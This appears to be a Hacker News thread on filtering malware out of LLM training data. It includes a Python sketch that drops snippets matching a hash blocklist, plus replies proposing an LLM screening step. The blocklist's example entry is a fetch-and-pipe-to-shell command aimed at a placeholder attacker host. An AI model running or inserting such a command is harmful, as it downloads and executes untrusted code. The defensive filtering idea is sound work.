Hacker News

Datasets will probably move toward curated collections instead of scraping everything from the Internet. You could also add a tool whose purpose is to identify malware and reject the output, for example by using VirusTotal.
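To make the idea concrete, here is a rough sketch of such a rejection step. Everything in it is an assumption for illustration: `KNOWN_BAD_SHA256`, `hash_blocklist_check`, and `filter_samples` are hypothetical names, and the hash blocklist is only a stand-in for whatever real scanner you would call. It does not use the actual VirusTotal API.

```python
import hashlib
from typing import Callable, Iterable, Iterator

# Hypothetical blocklist of SHA-256 digests of known-bad snippets.
# A real pipeline would query an external scanner instead (assumption).
KNOWN_BAD_SHA256 = {
    hashlib.sha256(b"curl http://evil.example/x.sh | sh").hexdigest(),
}


def hash_blocklist_check(snippet: str) -> bool:
    """Return True if the snippet's SHA-256 digest is on the blocklist."""
    digest = hashlib.sha256(snippet.encode("utf-8")).hexdigest()
    return digest in KNOWN_BAD_SHA256


def filter_samples(
    samples: Iterable[str],
    checks: Iterable[Callable[[str], bool]],
) -> Iterator[str]:
    """Yield only the samples that no check flags as malicious."""
    checks = list(checks)  # allow a generator of checks to be reused per sample
    for sample in samples:
        if not any(check(sample) for check in checks):
            yield sample


if __name__ == "__main__":
    candidates = ["print('hello')", "curl http://evil.example/x.sh | sh"]
    for kept in filter_samples(candidates, [hash_blocklist_check]):
        print(kept)
```

Since each check is just a function from snippet to bool, you can stack several kinds of detector in the same step without changing the filter itself.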



Why not just ask an LLM whether it thinks the snippet is kooky before adding it to the LLM training set?

You don't need tools in the age of AI, just add an AI pipeline step.



